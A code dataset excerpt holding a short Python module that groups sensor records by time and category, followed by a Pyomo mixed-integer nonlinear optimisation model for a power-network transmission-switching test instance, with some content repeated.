records.sort(key=itemgetter(1))
result = ['X', *[key[1] for key, _ in groupby(
records, key=itemgetter(1, 2))]]
return result
def group_category(records):
"""Lololo."""
records.sort(key=itemgetter(3))
result = [{
'id': key[0],
'name': key[1],
'measure': key[2],
'data': [*[item for item in group]],
} for key, group in groupby(records, key=itemgetter(3, 4, 5))]
for item in result:
item['rows'] = group_time(item['data'])
item['cols'] = group_sensor(item['data'])
item.pop('data')
return result
# [
# {
# "cols": [
# "X",
# "Sens 1",
# "Sens 2"
# ],
# "id": 1,
# "measure": "AAA",
# "name": "Cat 1",
# "rows": [
# [
# 10.916666666666666,
# 17.0,
# 14.0
# ]
# ]
# },
# {
# "cols": [
# "X",
# "Sens 3"
# ],
# "id": 2,
# "measure": "AAA",
# "name": "Cat 2",
# "rows": [
# [
# 10.916666666666666,
# 13.0
# ]
# ]
# }
# ] | 19.731707 | 66 | 0.487639 | # Copyright © 2018 Stanislav Hnatiuk. All rights reserved.
"""Module of functions."""
from operator import itemgetter
from itertools import groupby
def stime_to_decimal(s):
"""Lololo."""
return s.hour + s.minute / 60
def group_time(records):
"""Lololo."""
records.sort(key=itemgetter(6, 1))
result = [
[stime_to_decimal(time), *[item[0] for item in group]]
for time, group in groupby(records, key=itemgetter(6))
]
return result
def group_sensor(records):
"""Lololo."""
records.sort(key=itemgetter(1))
result = ['X', *[key[1] for key, _ in groupby(
records, key=itemgetter(1, 2))]]
return result
def group_category(records):
"""Lololo."""
records.sort(key=itemgetter(3))
result = [{
'id': key[0],
'name': key[1],
'measure': key[2],
'data': [*[item for item in group]],
} for key, group in groupby(records, key=itemgetter(3, 4, 5))]
for item in result:
item['rows'] = group_time(item['data'])
item['cols'] = group_sensor(item['data'])
item.pop('data')
return result
# [
# {
# "cols": [
# "X",
# "Sens 1",
# "Sens 2"
# ],
# "id": 1,
# "measure": "AAA",
# "name": "Cat 1",
# "rows": [
# [
# 10.916666666666666,
# 17.0,
# 14.0
# ]
# ]
# },
# {
# "cols": [
# "X",
# "Sens 3"
# ],
# "id": 2,
# "measure": "AAA",
# "name": "Cat 2",
# "rows": [
# [
# 10.916666666666666,
# 13.0
# ]
# ]
# }
# ] | 0 | 0 | 0 |
83f168eee9b74da62f383dcf9b275bd1bf380a28 | 15,770 | py | Python | tests/examples/minlplib/transswitch0009p.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | 2 | 2021-07-03T13:19:10.000Z | 2022-02-06T10:48:13.000Z | tests/examples/minlplib/transswitch0009p.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | 1 | 2021-07-04T14:52:14.000Z | 2021-07-15T10:17:11.000Z | tests/examples/minlplib/transswitch0009p.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | null | null | null | # MINLP written by GAMS Convert at 04/21/18 13:54:56
#
# Equation counts
# Total E G L N X C B
# 140 56 33 51 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 70 61 9 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 401 182 219 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x2 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x3 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x4 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x5 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x6 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x7 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x8 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x9 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x10 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x11 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x12 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x13 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x14 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x15 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x16 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x17 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x18 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x19 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x20 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x21 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x22 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x23 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x24 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x25 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x26 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x27 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x28 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x29 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x30 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x31 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x32 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x33 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x34 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x35 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x36 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x37 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x38 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x39 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x40 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x41 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x42 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x43 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x44 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x45 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x46 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x47 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x48 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x49 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x50 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x51 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x52 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x53 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x54 = Var(within=Reals,bounds=(None,None),initialize=0)
m.b55 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b56 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b57 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b58 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b59 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b60 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b61 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b62 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b63 = Var(within=Binary,bounds=(0,1),initialize=0)
m.x64 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x65 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x66 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x67 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x68 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x69 = Var(within=Reals,bounds=(None,None),initialize=0)
m.obj = Objective(expr=1100*m.x64**2 + 500*m.x64 + 850*m.x65**2 + 120*m.x65 + 1225*m.x66**2 + 100*m.x66
+ 1085, sense=minimize)
m.c2 = Constraint(expr=-17.0648464163823*m.x3*m.x6*sin(m.x48 - m.x51)*m.b55 + m.x10 == 0)
m.c3 = Constraint(expr=-17.0648464163823*m.x6*m.x3*sin(m.x51 - m.x48)*m.b55 + m.x11 == 0)
m.c4 = Constraint(expr=-(1.61712247324614*m.x7**2 - 1.61712247324614*m.x7*m.x8*cos(m.x52 - m.x53) + 13.6979785969084*
m.x7*m.x8*sin(m.x52 - m.x53))*m.b56 + m.x12 == 0)
m.c5 = Constraint(expr=-(1.61712247324614*m.x8**2 - 1.61712247324614*m.x8*m.x7*cos(m.x53 - m.x52) + 13.6979785969084*
m.x8*m.x7*sin(m.x53 - m.x52))*m.b56 + m.x13 == 0)
m.c6 = Constraint(expr=-(1.28200913842411*m.x5**2 - 1.28200913842411*m.x5*m.x6*cos(m.x50 - m.x51) + 5.58824496236153*
m.x5*m.x6*sin(m.x50 - m.x51))*m.b57 + m.x14 == 0)
m.c7 = Constraint(expr=-(1.28200913842411*m.x6**2 - 1.28200913842411*m.x6*m.x5*cos(m.x51 - m.x50) + 5.58824496236153*
m.x6*m.x5*sin(m.x51 - m.x50))*m.b57 + m.x15 == 0)
m.c8 = Constraint(expr=-(1.1550874808901*m.x6**2 - 1.1550874808901*m.x6*m.x7*cos(m.x51 - m.x52) + 9.78427042636317*m.x6*
m.x7*sin(m.x51 - m.x52))*m.b58 + m.x16 == 0)
m.c9 = Constraint(expr=-(1.1550874808901*m.x7**2 - 1.1550874808901*m.x7*m.x6*cos(m.x52 - m.x51) + 9.78427042636317*m.x7*
m.x6*sin(m.x52 - m.x51))*m.b58 + m.x17 == 0)
m.c10 = Constraint(expr=-16*m.x8*m.x2*sin(m.x53 - m.x47)*m.b59 + m.x18 == 0)
m.c11 = Constraint(expr=-16*m.x2*m.x8*sin(m.x47 - m.x53)*m.b59 + m.x19 == 0)
m.c12 = Constraint(expr=-(1.94219124871473*m.x4**2 - 1.94219124871473*m.x4*m.x5*cos(m.x49 - m.x50) + 10.5106820518679*
m.x4*m.x5*sin(m.x49 - m.x50))*m.b60 + m.x20 == 0)
m.c13 = Constraint(expr=-(1.94219124871473*m.x5**2 - 1.94219124871473*m.x5*m.x4*cos(m.x50 - m.x49) + 10.5106820518679*
m.x5*m.x4*sin(m.x50 - m.x49))*m.b60 + m.x21 == 0)
m.c14 = Constraint(expr=-17.3611111111111*m.x1*m.x4*sin(m.x46 - m.x49)*m.b61 + m.x22 == 0)
m.c15 = Constraint(expr=-17.3611111111111*m.x4*m.x1*sin(m.x49 - m.x46)*m.b61 + m.x23 == 0)
m.c16 = Constraint(expr=-(1.36518771331058*m.x9**2 - 1.36518771331058*m.x9*m.x4*cos(m.x54 - m.x49) + 11.6040955631399*
m.x9*m.x4*sin(m.x54 - m.x49))*m.b62 + m.x24 == 0)
m.c17 = Constraint(expr=-(1.36518771331058*m.x4**2 - 1.36518771331058*m.x4*m.x9*cos(m.x49 - m.x54) + 11.6040955631399*
m.x4*m.x9*sin(m.x49 - m.x54))*m.b62 + m.x25 == 0)
m.c18 = Constraint(expr=-(1.18760437929115*m.x8**2 - 1.18760437929115*m.x8*m.x9*cos(m.x53 - m.x54) + 5.97513453330859*
m.x8*m.x9*sin(m.x53 - m.x54))*m.b63 + m.x26 == 0)
m.c19 = Constraint(expr=-(1.18760437929115*m.x9**2 - 1.18760437929115*m.x9*m.x8*cos(m.x54 - m.x53) + 5.97513453330859*
m.x9*m.x8*sin(m.x54 - m.x53))*m.b63 + m.x27 == 0)
m.c20 = Constraint(expr=-(17.0648464163823*m.x3**2 - 17.0648464163823*m.x3*m.x6*cos(m.x48 - m.x51))*m.b55 + m.x28 == 0)
m.c21 = Constraint(expr=-(17.0648464163823*m.x6**2 - 17.0648464163823*m.x6*m.x3*cos(m.x51 - m.x48))*m.b55 + m.x29 == 0)
m.c22 = Constraint(expr=-(13.6234785969084*m.x7**2 - 13.6979785969084*m.x7*m.x8*cos(m.x52 - m.x53) - 1.61712247324614*
m.x7*m.x8*sin(m.x52 - m.x53))*m.b56 + m.x30 == 0)
m.c23 = Constraint(expr=-(13.6234785969084*m.x8**2 - 13.6979785969084*m.x8*m.x7*cos(m.x53 - m.x52) - 1.61712247324614*
m.x8*m.x7*sin(m.x53 - m.x52))*m.b56 + m.x31 == 0)
m.c24 = Constraint(expr=-(5.40924496236153*m.x5**2 - 5.58824496236153*m.x5*m.x6*cos(m.x50 - m.x51) - 1.28200913842411*
m.x5*m.x6*sin(m.x50 - m.x51))*m.b57 + m.x32 == 0)
m.c25 = Constraint(expr=-(5.40924496236153*m.x6**2 - 5.58824496236153*m.x6*m.x5*cos(m.x51 - m.x50) - 1.28200913842411*
m.x6*m.x5*sin(m.x51 - m.x50))*m.b57 + m.x33 == 0)
m.c26 = Constraint(expr=-(9.67977042636317*m.x6**2 - 9.78427042636317*m.x6*m.x7*cos(m.x51 - m.x52) - 1.1550874808901*
m.x6*m.x7*sin(m.x51 - m.x52))*m.b58 + m.x34 == 0)
m.c27 = Constraint(expr=-(9.67977042636317*m.x7**2 - 9.78427042636317*m.x7*m.x6*cos(m.x52 - m.x51) - 1.1550874808901*
m.x7*m.x6*sin(m.x52 - m.x51))*m.b58 + m.x35 == 0)
m.c28 = Constraint(expr=-(16*m.x8**2 - 16*m.x8*m.x2*cos(m.x53 - m.x47))*m.b59 + m.x36 == 0)
m.c29 = Constraint(expr=-(16*m.x2**2 - 16*m.x2*m.x8*cos(m.x47 - m.x53))*m.b59 + m.x37 == 0)
m.c30 = Constraint(expr=-(10.4316820518679*m.x4**2 - 10.5106820518679*m.x4*m.x5*cos(m.x49 - m.x50) - 1.94219124871473*
m.x4*m.x5*sin(m.x49 - m.x50))*m.b60 + m.x38 == 0)
m.c31 = Constraint(expr=-(10.4316820518679*m.x5**2 - 10.5106820518679*m.x5*m.x4*cos(m.x50 - m.x49) - 1.94219124871473*
m.x5*m.x4*sin(m.x50 - m.x49))*m.b60 + m.x39 == 0)
m.c32 = Constraint(expr=-(17.3611111111111*m.x1**2 - 17.3611111111111*m.x1*m.x4*cos(m.x46 - m.x49))*m.b61 + m.x40 == 0)
m.c33 = Constraint(expr=-(17.3611111111111*m.x4**2 - 17.3611111111111*m.x4*m.x1*cos(m.x49 - m.x46))*m.b61 + m.x41 == 0)
m.c34 = Constraint(expr=-(11.5160955631399*m.x9**2 - 11.6040955631399*m.x9*m.x4*cos(m.x54 - m.x49) - 1.36518771331058*
m.x9*m.x4*sin(m.x54 - m.x49))*m.b62 + m.x42 == 0)
m.c35 = Constraint(expr=-(11.5160955631399*m.x4**2 - 11.6040955631399*m.x4*m.x9*cos(m.x49 - m.x54) - 1.36518771331058*
m.x4*m.x9*sin(m.x49 - m.x54))*m.b62 + m.x43 == 0)
m.c36 = Constraint(expr=-(5.82213453330859*m.x8**2 - 5.97513453330859*m.x8*m.x9*cos(m.x53 - m.x54) - 1.18760437929115*
m.x8*m.x9*sin(m.x53 - m.x54))*m.b63 + m.x44 == 0)
m.c37 = Constraint(expr=-(5.82213453330859*m.x9**2 - 5.97513453330859*m.x9*m.x8*cos(m.x54 - m.x53) - 1.18760437929115*
m.x9*m.x8*sin(m.x54 - m.x53))*m.b63 + m.x45 == 0)
m.c38 = Constraint(expr=m.x10**2 + m.x28**2 <= 9)
m.c39 = Constraint(expr=m.x11**2 + m.x29**2 <= 9)
m.c40 = Constraint(expr=m.x12**2 + m.x30**2 <= 6.25)
m.c41 = Constraint(expr=m.x13**2 + m.x31**2 <= 6.25)
m.c42 = Constraint(expr=m.x14**2 + m.x32**2 <= 2.25)
m.c43 = Constraint(expr=m.x15**2 + m.x33**2 <= 2.25)
m.c44 = Constraint(expr=m.x16**2 + m.x34**2 <= 2.25)
m.c45 = Constraint(expr=m.x17**2 + m.x35**2 <= 2.25)
m.c46 = Constraint(expr=m.x18**2 + m.x36**2 <= 6.25)
m.c47 = Constraint(expr=m.x19**2 + m.x37**2 <= 6.25)
m.c48 = Constraint(expr=m.x20**2 + m.x38**2 <= 6.25)
m.c49 = Constraint(expr=m.x21**2 + m.x39**2 <= 6.25)
m.c50 = Constraint(expr=m.x22**2 + m.x40**2 <= 6.25)
m.c51 = Constraint(expr=m.x23**2 + m.x41**2 <= 6.25)
m.c52 = Constraint(expr=m.x24**2 + m.x42**2 <= 6.25)
m.c53 = Constraint(expr=m.x25**2 + m.x43**2 <= 6.25)
m.c54 = Constraint(expr=m.x26**2 + m.x44**2 <= 6.25)
m.c55 = Constraint(expr=m.x27**2 + m.x45**2 <= 6.25)
m.c56 = Constraint(expr= m.x64 <= 2.5)
m.c57 = Constraint(expr= m.x65 <= 3)
m.c58 = Constraint(expr= m.x66 <= 2.7)
m.c59 = Constraint(expr= m.x64 >= 0.1)
m.c60 = Constraint(expr= m.x65 >= 0.1)
m.c61 = Constraint(expr= m.x66 >= 0.1)
m.c62 = Constraint(expr= m.x67 <= 3)
m.c63 = Constraint(expr= m.x68 <= 3)
m.c64 = Constraint(expr= m.x69 <= 3)
m.c65 = Constraint(expr= m.x67 >= -3)
m.c66 = Constraint(expr= m.x68 >= -3)
m.c67 = Constraint(expr= m.x69 >= -3)
m.c68 = Constraint(expr= m.x1 <= 1.1)
m.c69 = Constraint(expr= m.x2 <= 1.1)
m.c70 = Constraint(expr= m.x3 <= 1.1)
m.c71 = Constraint(expr= m.x4 <= 1.1)
m.c72 = Constraint(expr= m.x5 <= 1.1)
m.c73 = Constraint(expr= m.x6 <= 1.1)
m.c74 = Constraint(expr= m.x7 <= 1.1)
m.c75 = Constraint(expr= m.x8 <= 1.1)
m.c76 = Constraint(expr= m.x9 <= 1.1)
m.c77 = Constraint(expr= m.x1 >= 0.9)
m.c78 = Constraint(expr= m.x2 >= 0.9)
m.c79 = Constraint(expr= m.x3 >= 0.9)
m.c80 = Constraint(expr= m.x4 >= 0.9)
m.c81 = Constraint(expr= m.x5 >= 0.9)
m.c82 = Constraint(expr= m.x6 >= 0.9)
m.c83 = Constraint(expr= m.x7 >= 0.9)
m.c84 = Constraint(expr= m.x8 >= 0.9)
m.c85 = Constraint(expr= m.x9 >= 0.9)
m.c86 = Constraint(expr= m.x48 - m.x51 >= -0.26)
m.c87 = Constraint(expr= - m.x48 + m.x51 >= -0.26)
m.c88 = Constraint(expr= m.x52 - m.x53 >= -0.26)
m.c89 = Constraint(expr= - m.x52 + m.x53 >= -0.26)
m.c90 = Constraint(expr= m.x50 - m.x51 >= -0.26)
m.c91 = Constraint(expr= - m.x50 + m.x51 >= -0.26)
m.c92 = Constraint(expr= m.x51 - m.x52 >= -0.26)
m.c93 = Constraint(expr= - m.x51 + m.x52 >= -0.26)
m.c94 = Constraint(expr= - m.x47 + m.x53 >= -0.26)
m.c95 = Constraint(expr= m.x47 - m.x53 >= -0.26)
m.c96 = Constraint(expr= m.x49 - m.x50 >= -0.26)
m.c97 = Constraint(expr= - m.x49 + m.x50 >= -0.26)
m.c98 = Constraint(expr= m.x46 - m.x49 >= -0.26)
m.c99 = Constraint(expr= - m.x46 + m.x49 >= -0.26)
m.c100 = Constraint(expr= - m.x49 + m.x54 >= -0.26)
m.c101 = Constraint(expr= m.x49 - m.x54 >= -0.26)
m.c102 = Constraint(expr= m.x53 - m.x54 >= -0.26)
m.c103 = Constraint(expr= - m.x53 + m.x54 >= -0.26)
m.c104 = Constraint(expr= m.x48 - m.x51 <= 0.26)
m.c105 = Constraint(expr= - m.x48 + m.x51 <= 0.26)
m.c106 = Constraint(expr= m.x52 - m.x53 <= 0.26)
m.c107 = Constraint(expr= - m.x52 + m.x53 <= 0.26)
m.c108 = Constraint(expr= m.x50 - m.x51 <= 0.26)
m.c109 = Constraint(expr= - m.x50 + m.x51 <= 0.26)
m.c110 = Constraint(expr= m.x51 - m.x52 <= 0.26)
m.c111 = Constraint(expr= - m.x51 + m.x52 <= 0.26)
m.c112 = Constraint(expr= - m.x47 + m.x53 <= 0.26)
m.c113 = Constraint(expr= m.x47 - m.x53 <= 0.26)
m.c114 = Constraint(expr= m.x49 - m.x50 <= 0.26)
m.c115 = Constraint(expr= - m.x49 + m.x50 <= 0.26)
m.c116 = Constraint(expr= m.x46 - m.x49 <= 0.26)
m.c117 = Constraint(expr= - m.x46 + m.x49 <= 0.26)
m.c118 = Constraint(expr= - m.x49 + m.x54 <= 0.26)
m.c119 = Constraint(expr= m.x49 - m.x54 <= 0.26)
m.c120 = Constraint(expr= m.x53 - m.x54 <= 0.26)
m.c121 = Constraint(expr= - m.x53 + m.x54 <= 0.26)
m.c122 = Constraint(expr= m.x46 == 0)
m.c123 = Constraint(expr= m.x22 - m.x64 == 0)
m.c124 = Constraint(expr= m.x19 - m.x65 == 0)
m.c125 = Constraint(expr= m.x10 - m.x66 == 0)
m.c126 = Constraint(expr= m.x40 - m.x67 == 0)
m.c127 = Constraint(expr= m.x37 - m.x68 == 0)
m.c128 = Constraint(expr= m.x28 - m.x69 == 0)
m.c129 = Constraint(expr= m.x20 + m.x23 + m.x25 == 0)
m.c130 = Constraint(expr= m.x14 + m.x21 == -0.9)
m.c131 = Constraint(expr= m.x11 + m.x15 + m.x16 == 0)
m.c132 = Constraint(expr= m.x12 + m.x17 == -1)
m.c133 = Constraint(expr= m.x13 + m.x18 + m.x26 == 0)
m.c134 = Constraint(expr= m.x24 + m.x27 == -1.25)
m.c135 = Constraint(expr= m.x38 + m.x41 + m.x43 == 0)
m.c136 = Constraint(expr= m.x32 + m.x39 == -0.3)
m.c137 = Constraint(expr= m.x29 + m.x33 + m.x34 == 0)
m.c138 = Constraint(expr= m.x30 + m.x35 == -0.35)
m.c139 = Constraint(expr= m.x31 + m.x36 + m.x44 == 0)
m.c140 = Constraint(expr= m.x42 + m.x45 == -0.5)
| 39.52381 | 120 | 0.603995 | # MINLP written by GAMS Convert at 04/21/18 13:54:56
#
# Equation counts
# Total E G L N X C B
# 140 56 33 51 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 70 61 9 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 401 182 219 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x2 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x3 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x4 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x5 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x6 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x7 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x8 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x9 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x10 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x11 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x12 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x13 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x14 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x15 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x16 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x17 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x18 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x19 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x20 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x21 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x22 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x23 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x24 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x25 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x26 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x27 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x28 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x29 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x30 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x31 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x32 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x33 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x34 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x35 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x36 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x37 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x38 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x39 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x40 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x41 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x42 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x43 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x44 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x45 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x46 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x47 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x48 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x49 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x50 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x51 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x52 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x53 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x54 = Var(within=Reals,bounds=(None,None),initialize=0)
m.b55 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b56 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b57 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b58 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b59 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b60 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b61 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b62 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b63 = Var(within=Binary,bounds=(0,1),initialize=0)
m.x64 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x65 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x66 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x67 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x68 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x69 = Var(within=Reals,bounds=(None,None),initialize=0)
m.obj = Objective(expr=1100*m.x64**2 + 500*m.x64 + 850*m.x65**2 + 120*m.x65 + 1225*m.x66**2 + 100*m.x66
+ 1085, sense=minimize)
m.c2 = Constraint(expr=-17.0648464163823*m.x3*m.x6*sin(m.x48 - m.x51)*m.b55 + m.x10 == 0)
m.c3 = Constraint(expr=-17.0648464163823*m.x6*m.x3*sin(m.x51 - m.x48)*m.b55 + m.x11 == 0)
m.c4 = Constraint(expr=-(1.61712247324614*m.x7**2 - 1.61712247324614*m.x7*m.x8*cos(m.x52 - m.x53) + 13.6979785969084*
m.x7*m.x8*sin(m.x52 - m.x53))*m.b56 + m.x12 == 0)
m.c5 = Constraint(expr=-(1.61712247324614*m.x8**2 - 1.61712247324614*m.x8*m.x7*cos(m.x53 - m.x52) + 13.6979785969084*
m.x8*m.x7*sin(m.x53 - m.x52))*m.b56 + m.x13 == 0)
m.c6 = Constraint(expr=-(1.28200913842411*m.x5**2 - 1.28200913842411*m.x5*m.x6*cos(m.x50 - m.x51) + 5.58824496236153*
m.x5*m.x6*sin(m.x50 - m.x51))*m.b57 + m.x14 == 0)
m.c7 = Constraint(expr=-(1.28200913842411*m.x6**2 - 1.28200913842411*m.x6*m.x5*cos(m.x51 - m.x50) + 5.58824496236153*
m.x6*m.x5*sin(m.x51 - m.x50))*m.b57 + m.x15 == 0)
m.c8 = Constraint(expr=-(1.1550874808901*m.x6**2 - 1.1550874808901*m.x6*m.x7*cos(m.x51 - m.x52) + 9.78427042636317*m.x6*
m.x7*sin(m.x51 - m.x52))*m.b58 + m.x16 == 0)
m.c9 = Constraint(expr=-(1.1550874808901*m.x7**2 - 1.1550874808901*m.x7*m.x6*cos(m.x52 - m.x51) + 9.78427042636317*m.x7*
m.x6*sin(m.x52 - m.x51))*m.b58 + m.x17 == 0)
m.c10 = Constraint(expr=-16*m.x8*m.x2*sin(m.x53 - m.x47)*m.b59 + m.x18 == 0)
m.c11 = Constraint(expr=-16*m.x2*m.x8*sin(m.x47 - m.x53)*m.b59 + m.x19 == 0)
m.c12 = Constraint(expr=-(1.94219124871473*m.x4**2 - 1.94219124871473*m.x4*m.x5*cos(m.x49 - m.x50) + 10.5106820518679*
m.x4*m.x5*sin(m.x49 - m.x50))*m.b60 + m.x20 == 0)
m.c13 = Constraint(expr=-(1.94219124871473*m.x5**2 - 1.94219124871473*m.x5*m.x4*cos(m.x50 - m.x49) + 10.5106820518679*
m.x5*m.x4*sin(m.x50 - m.x49))*m.b60 + m.x21 == 0)
m.c14 = Constraint(expr=-17.3611111111111*m.x1*m.x4*sin(m.x46 - m.x49)*m.b61 + m.x22 == 0)
m.c15 = Constraint(expr=-17.3611111111111*m.x4*m.x1*sin(m.x49 - m.x46)*m.b61 + m.x23 == 0)
m.c16 = Constraint(expr=-(1.36518771331058*m.x9**2 - 1.36518771331058*m.x9*m.x4*cos(m.x54 - m.x49) + 11.6040955631399*
m.x9*m.x4*sin(m.x54 - m.x49))*m.b62 + m.x24 == 0)
m.c17 = Constraint(expr=-(1.36518771331058*m.x4**2 - 1.36518771331058*m.x4*m.x9*cos(m.x49 - m.x54) + 11.6040955631399*
m.x4*m.x9*sin(m.x49 - m.x54))*m.b62 + m.x25 == 0)
m.c18 = Constraint(expr=-(1.18760437929115*m.x8**2 - 1.18760437929115*m.x8*m.x9*cos(m.x53 - m.x54) + 5.97513453330859*
m.x8*m.x9*sin(m.x53 - m.x54))*m.b63 + m.x26 == 0)
